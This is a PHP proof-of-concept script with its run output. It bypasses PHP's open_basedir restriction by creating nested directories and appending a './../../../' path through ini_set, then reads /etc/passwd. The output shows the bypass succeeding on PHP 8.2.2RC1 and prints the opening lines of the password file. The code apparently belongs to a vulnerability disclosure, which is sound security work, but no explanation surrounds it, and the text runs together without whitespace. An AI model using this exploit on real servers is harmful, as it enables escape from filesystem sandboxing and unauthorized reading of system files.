<?php//just as an example, we try to read /etc/passwdfunctionread_etc_passwd(){$content = @file_get_contents("/etc/passwd");if ($content !==false){echo$content;}else {echo"Nope, /etc/passwd not readable".PHP_EOL;} }echo"Running PHP version".PHP_VERSION.PHP_EOL;read_etc_passwd();//should fail$path ="a/b/c";//create 3 sub-dirs, cause we are in /usr/src/myapp (3 levels)$here =getcwd();//save CWDif (mkdir($path,0777,true)){chdir($path);//move to these new dirsini_set("open_basedir",ini_get('open_basedir').":../../../");//try to change open_basedir with old payloadchdir($here);//get back to previous direcho"open_basedir directive is still".ini_get('open_basedir').PHP_EOL;//should have failed, open_basedir is still the sameread_etc_passwd();//confirm by trying to read /etc/passwd, should fail }//now do the same, but preprend ./ while modifying open_basedir$path ="d/e/f";if (mkdir($path,0777,true)){chdir($path);ini_set("open_basedir",ini_get('open_basedir').":./../../../");chdir($here);echo"open_basedir directive is now".ini_get('open_basedir').PHP_EOL;read_etc_passwd();//now it works  }?>

Running PHP version 8.2.2RC1Nope, /etc/passwd not readableopen_basedir directive is still /usr/src/myapp/Nope, /etc/passwd not readableopen_basedir directive is now /usr/src/myapp/:./../../../root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologin...